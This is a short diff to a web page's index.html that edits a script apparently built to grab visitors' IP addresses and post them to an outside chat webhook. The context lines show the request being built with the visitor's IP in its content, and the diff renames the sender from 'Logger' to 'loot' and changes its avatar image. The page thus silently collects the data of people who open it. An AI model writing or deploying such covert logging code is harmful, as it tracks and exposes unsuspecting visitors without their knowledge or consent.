--- a/index.html
+++ b/index.html
@@ -71,8 +71,8 @@ function getIP(json) {
       request.setRequestHeader('Content-type', 'application/json');
 
       var params = {
-        username: "Logger",
-        avatar_url: "https://i.pinimg.com/originals/d8/eb/57/d8eb57825be593ff8993265cf5eea794.jpg",
+        username: "loot",
+        avatar_url: "https://api.upload.systems/images/0b5NBUfx/download",
         content: "**IP:** *" + json.ip + "*"
       }
    
